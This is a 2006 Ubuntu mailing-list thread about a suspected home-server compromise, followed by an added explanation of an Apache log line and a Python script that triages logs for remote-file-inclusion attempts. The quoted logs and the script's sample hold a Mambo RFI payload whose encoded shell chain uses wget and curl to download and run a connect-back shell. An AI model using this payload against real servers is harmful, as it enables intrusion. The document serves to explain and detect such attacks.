My home desktop was compromised, but how?

Carthik Sharma carthik at gmail.com
Wed Mar 1 04:04:10 UTC 2006


On 2/28/06, Dennis Kaarsemaker <dennis at kaarsemaker.net> wrote:
> On di, 2006-02-28 at 15:44 -0500, Carthik Sharma wrote:
> > Somebody seems to have hacked into my desktop/server. I find files in
> > the /tmp/ (like "agent.8213") directory which I cannot open, these are
> > setuid-ed -- how do I open these?
>
> These may very well be normal, many applications place things in /tmp.
>
> Try sudo ls /tmp/agent.8213 to see the contents

I tried sudo vi agent.8213 and got a "permission denied" message.

>
> > In my apache access logs, there are things like
> > "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%
> > 20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%
> > 208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt
> > %20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%
> > 20http://216.99.218.183/cback;chmod%20744%20cback;./cback%
> > 20217.160.242.90%208081;curl%20-o%20dc.txt%
> > 20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%
> > 20217.160.242.90%208081;echo%20YYY;echo|"
> >
> > That above is a valid url, and will take you to a script to deface
> > someone's php script etc, I suppose. Now, how did this malicious
> > hacker get in my computer?
>

> That is just an attempt to deface a mambo site. If you don't use mambo:
> don't worry (anyone can request any weird looking url on your server,
> and it'll end up in your log). If you do run mambo: make sure you're up
> to date.

There are many, many more like the above, for all sorts of PHP-powered sites.

Now, in:

192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"

the 192.168.0.201 is the local ip address of my desktop -- Does this
mean that 192.168.0.201 was the "origin" of the request? This is what
had me worried -- my desktop making requests for pages on itself,
without my intending to. So I thought there was a script at work.

I had to pull out the ethernet cable to be able to log in, this being
an old Pentium-III computer and all.

Thanks for your guidance.
Carthik.
> --
> Dennis K.
>  - Linux for human beings - http://www.ubuntu.com
>  - Linux voor normale mensen - htp://www.ubuntu-nl.org
>
>
>
>
> --
> ubuntu-users mailing list
> ubuntu-users at lists.ubuntu.com
> https://lists.ubuntu.com/mailman/listinfo/ubuntu-users


--
Ph.D. Candidate
University of Central Florida
Homepage: http://carthik.net
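The log line quoted in the message above is worth reading field by field, because the answers to both of the questions asked are in it. In Apache's combined log format the first field (%h) is the address of the peer that opened the connection, so a LAN address there means the request was sent from that host (or from something proxying for it). The parameter mosConfig_absolute_path=http://... is the shape of a remote file inclusion attempt against Mambo, and the cmd= value is a percent-encoded chain of download-and-run shell commands. The 404 status means index2.php did not exist on this server, so the included file was never fetched or executed. The script below is an added example, not code from the thread or from Ubuntu; it parses combined-format lines, splits the query string without treating ';' as a separator (so shell chains stay intact), and flags URL-valued parameters and command chains. The sample log is constructed to mirror the quoted line, with the external addresses replaced by RFC 5737 documentation ranges.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# %h is the address of the peer that opened the TCP connection (the client,
# or a proxy in front of it), not the address of the server.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log: the first line mirrors the request quoted in the
# thread, with external addresses replaced by RFC 5737 documentation ranges;
# the second is an ordinary, benign request for contrast.
SAMPLE_LOG = """\
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://192.0.2.10/cmd.txt?&cmd=cd%20/tmp;wget%20198.51.100.5/cback;chmod%20744%20cback;./cback%20203.0.113.7%208081;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
203.0.113.44 - - [26/Feb/2006:15:01:12 -0500] "GET /index.php?option=com_content&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Verbs that typically appear in "download and run" command chains.
SHELL_VERBS = ("wget", "curl", "chmod", "perl", "sh ", "cd ")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def query_params(target):
    """Split the request target's query string into (name, value) pairs.

    Splits only on '&' so that ';' inside a value (a shell separator)
    survives; names and values are percent-decoded.
    """
    _, _, query = target.partition("?")
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def triage(line):
    """Flag remote-file-inclusion and command-chain indicators in one log line."""
    rec = parse_line(line)
    if rec is None:
        return None
    params = query_params(rec["target"])
    # A parameter whose value is itself a URL is the classic RFI shape
    # (e.g. mosConfig_absolute_path=http://.../cmd.txt).
    rfi = [n for n, v in params if re.match(r"(?i)^(https?|ftp)://", v)]
    # A value chaining several commands with ';' plus download/run verbs.
    cmd = [n for n, v in params
           if ";" in v and sum(verb in v for verb in SHELL_VERBS) >= 2]
    return {
        "client": rec["client"],
        "status": rec["status"],
        # 2xx/3xx means the script existed and ran; 404 means the path was absent.
        "script_found": rec["status"] < 400,
        "rfi_params": rfi,
        "cmd_params": cmd,
        "suspicious": bool(rfi or cmd),
    }


def triage_log(text):
    """Run triage over every non-empty line and return the suspicious records."""
    results = [triage(l) for l in text.splitlines() if l.strip()]
    return [r for r in results if r and r["suspicious"]]


if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit)
```

Run against a real access log with `triage_log(open("access.log").read())`. A hit whose `client` is a LAN address and whose `script_found` is True is the case that warrants pulling the machine off the network and looking for what on that host sent the request; a hit with a 404 is noise from a scanner that found nothing to include.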

